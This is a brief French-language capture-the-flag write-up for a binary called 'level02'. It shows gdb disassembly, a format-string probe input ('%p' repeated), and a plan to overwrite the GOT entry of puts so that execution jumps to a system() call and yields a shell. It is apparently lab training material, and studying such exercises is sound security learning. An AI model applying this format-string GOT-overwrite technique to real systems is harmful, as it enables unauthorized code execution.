disas main
[...]
  0x0000000000400a9d <+649>:	mov    $0x0,%eax
  0x0000000000400aa2 <+654>:	callq  0x4006c0 <printf@plt> /// vulnérabilité
  0x0000000000400aa7 <+659>:	mov    $0x400d3a,%edi
  0x0000000000400aac <+664>:	callq  0x400680 <puts@plt> // ici
[...]

username : %p %p %p %p %p %p %p %p
password : AAAAAAAAAAAAAAAA

on remarque que le 8eme fonction sur la stack est notre printf

on va vouloir remplacer puts par un jump avant le systeme

et on converti celle-ci en décimal : 0x0000000000400a6c -> 4196972

disas main
[...]
  0x0000000000400a6c <+600>:	mov    $0x400d22,%eax /// jump ICI
  0x0000000000400a71 <+605>:	lea    -0x70(%rbp),%rdx
  0x0000000000400a75 <+609>:	mov    %rdx,%rsi
  0x0000000000400a78 <+612>:	mov    %rax,%rdi
  0x0000000000400a7b <+615>:	mov    $0x0,%eax
  0x0000000000400a80 <+620>:	callq  0x4006c0 <printf@plt>
  0x0000000000400a85 <+625>:	mov    $0x400d32,%edi
  0x0000000000400a8a <+630>:	callq  0x4006b0 <system@plt> pour le shell ici
[...]

pour obtenir l'adresse de Puts on fait un objdump -R ./level02 : 00000000006011e0
